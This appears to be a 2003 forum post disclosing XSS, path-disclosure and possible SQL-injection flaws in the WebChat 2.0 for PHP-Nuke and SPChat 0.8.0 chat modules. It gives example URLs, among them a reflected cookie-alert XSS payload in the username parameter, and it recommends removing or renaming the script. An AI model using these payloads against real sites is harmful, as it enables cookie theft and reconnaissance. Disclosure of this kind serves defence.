Go Back   Computer Forums > General Computing > Cyber Safety and Computer Security
Join Computer forums Today

Thread Tools Search this Thread Display Modes
Old 06-03-2003, 08:32 PM   #1
Join Date: May 2003
Posts: 56
Default Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0 Vunerabilities

Vulnerability Type : XSS (Cross Site Scripting).. Path Disclosure.. revealed of DBUser Name.. possible SQL injection ...

SFChat & WebChat are very good and stable systems of chat online.. but they indeed have there faults ...

Our findings prior to notifying the source writer along with our associates around the web ...

Warning : Access denied for user: you@localhost (Using password:
YES) in /home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php

DataBase error will read : Link_ID == false, connect failed ...

MySQL error : 0 () Session halted ...

Path disclosure :

http://www.you.com/modules/WebChat/in.php </redirect.php?http://www.you.com/modules/WebChat/in.php>
http://www.you.com/modules/WebChat/quit.php </redirect.php?http://www.you.com/modules/WebChat/quit.php>
http://www.you.com/modules/WebChat/users.php </redirect.php?http://www.you.com/modules/WebChat/users.php>
]http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code] </redirect.php?http://www.you.com/modules/WebChat/u...d=-1&username=[Any_Word_or_your_code>
=">alert(document.cookie);http://www.you.com/modules/WebChat/u...d=-1&username=">alert(document.cookie); </redirect.php?http://www.you.com/modules/WebChat/u...id=-1&username>

Solution :

To Fix the script temporarily.. you must erase this script off your Web.. or change its name so that nobody has access to it ... You have to search the site of the writer / programmer in search of the new patch.. to be able to continue using this chat ...

This information was released only yesterday 06 - 02 - 03 and there is no immediate patch available ...

CourtneyDS is offline   Reply With Quote

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off

All times are GMT -5. The time now is 01:36 PM.

Powered by vBulletin® Version 3.8.8 Beta 4
Copyright ©2000 - 2016, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO 3.6.0